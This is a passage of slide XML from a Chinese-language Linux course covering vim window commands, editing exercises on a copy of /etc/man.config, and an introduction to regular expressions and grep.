                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="pl-PL" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>[ctrl]+w+ k</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="pl-PL" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>[ctrl]+w+↑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同上，不過游標移動到上面的視窗。。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081">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="pl-PL" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>[ctrl]+w+ q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其實就是 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>:q </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>結束離開啦！ 舉例來說，如果我想要結束下方的視窗，那麼利用 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>[ctrl]+w+↓ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>移動到下方視窗後，按下 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>:q </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>即可離開， 也可以按下 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>[ctrl]+</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1" smtClean="0"/>
                        <a:t>w+q</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>啊！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6574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TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>在自己的家目錄建立一個新的目錄 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>zzz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 smtClean="0"/>
              <a:t>將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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>man.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>複製</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目錄 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>zzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>並更名為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>vi1.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>編輯 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>vi1.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>，執行以下動作：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>先到第 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>行，再複製 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>行資料，再</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>到第 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>行，往下貼上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/>
              <a:t>再到最後一行，往下產生一行空白行方式進入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>插入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>模式進行編輯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>加入文字 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>ABCDEabcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>，換</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>行再加入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>'1234567890'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/>
              <a:t>搜尋字串 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>MANPATH"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>，並將其取代為你的學號。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>存檔後退出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r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830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TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>進入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>目錄 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>zzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty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man.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>複製更名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>vi2.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>編輯 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>vi2.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>，執行以下動作：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>先到第 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>行，剪下 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>行資料，再</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>到第 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>行，往上貼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>上。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>再</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>到第一行，往上產生一行空白行方式進入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>插入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>模式進行編輯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/>
              <a:t>加入文字 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>ABCDEabcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>，換</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>行再加入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>'1234567890'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>從第 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>行至最後一行搜尋字串 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>"MANPATH"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>，並將其取代為你的學號。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>存檔後退出。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/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2891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7992"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>在自己的家目錄建立一個新的目錄 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0" err="1"/>
              <a:t>zzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>進入目錄 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0" err="1"/>
              <a:t>zzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>編輯 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>vi3.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>，執行以下動作：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>先到第 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>35 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>行，再</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>到第 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>行，刪除這一行到第一行的資料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>將第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>行至第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>行複製到第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>將第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>行至第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>行移動到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>再到第 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>行，在這行的最後加入文字 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0" err="1"/>
              <a:t>ABCDEabcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>換行再加入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>'1234567890'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>從第 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>行至第 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>55 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>行搜尋字串 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>"man"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>，並將其取代</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0" smtClean="0"/>
              <a:t>888</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="25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749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sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t>八、正規</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>表示法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344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任何一個有經驗的系統管理員，都會告訴你：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>『</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>正規表示法真是挺重要的！</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>』 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>為什麼很重要呢？因為日常生活就使用的到啊！舉個例子來說， 在你日常使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>作文書處理或程式撰寫時使用到的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>『</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>搜尋</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>取代</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>』</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>等等的功能， 這些舉動要作的漂亮，就得要配合正規表示法來</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>處理。</a:t>
            </a:r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什麼是正規表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(grep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3562200" y="660240"/>
              <a:ext cx="2108880" cy="831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546360" y="596880"/>
                <a:ext cx="214056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6324480" y="3511440"/>
              <a:ext cx="1371960" cy="51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08640" y="3448080"/>
                <a:ext cx="14036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082960" y="1994040"/>
              <a:ext cx="2171880" cy="954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066760" y="1930320"/>
                <a:ext cx="22039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648320" y="2057400"/>
              <a:ext cx="20340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32480" y="1994040"/>
                <a:ext cx="2350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114640" y="4013280"/>
              <a:ext cx="864000" cy="255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098800" y="3949560"/>
                <a:ext cx="895680" cy="153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5319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400" dirty="0" err="1" smtClean="0"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>指令可以從</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>指定文</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>本檔案或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>標準輸出中查找符合條件的字符串，默認顯示其所在行的內容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 smtClean="0"/>
              <a:t>格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>grep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選項</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>要找的字串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>要尋找字串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>來</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>源檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>&gt;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grep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14400" y="1644480"/>
              <a:ext cx="775080" cy="385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8560" y="1581120"/>
                <a:ext cx="8067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235240" y="3251160"/>
              <a:ext cx="432000" cy="194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19400" y="3187800"/>
                <a:ext cx="4636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295800" y="3251160"/>
              <a:ext cx="324000" cy="129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79600" y="3187800"/>
                <a:ext cx="3560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629240" y="3156120"/>
              <a:ext cx="1092600" cy="702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13400" y="3092400"/>
                <a:ext cx="112428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2" name="筆跡 11"/>
